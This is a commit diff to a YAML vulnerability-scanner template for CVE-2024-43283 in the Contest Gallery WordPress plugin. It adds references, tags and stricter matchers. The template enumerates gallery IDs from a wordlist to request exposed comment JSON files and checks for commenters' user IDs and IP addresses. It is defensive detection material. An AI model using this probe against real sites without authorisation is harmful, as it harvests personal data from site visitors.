Update CVE-2024-43283.yaml

CVE-2024-43283.yaml

@@ -8,36 +8,42 @@ info:
     An attacker can retrieve your userID and IP address of commentors.
   reference:
     - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/contest-gallery/contest-gallery-2312-unauthenticated-information-exposure
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-43283
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3
     cve-id: CVE-2024-43283
     cwe-id: CWE-200
   metadata:
-    vendor: Wasiliy Strecker / ContestGallery developer
-    product: contest-gallery
-  tags: cve,cve2024
-  
+    verified: false
+    max-request: 1
+  tags: cve,cve2024,wordpress,wp,wp-plugin,contest-gallery,disclosure
+
 http:
   - raw:
       - |
         GET /wp-content/uploads/contest-gallery/gallery-id-{{path}}/json/image-comments/image-comments-{{path}}.json HTTP/1.1
         Host: {{Hostname}} 
-      
+
     payloads:
-       path: helpers/wordlists/numbers.txt   
-    attack: batteringram             
+       path: helpers/wordlists/numbers.txt
+    attack: batteringram
+
+    matchers-condition: and
     matchers:
       - type: word
+        part: body
         words:
           - "WpUserId"
           - "userIP"
         condition: and
+        case-insensitive: true
+
+      - type: word
+        part: content_type
+        words:
+          - "application/json"
+
       - type: status
         status:
           - 200
-        condition: and
-            
-
-
-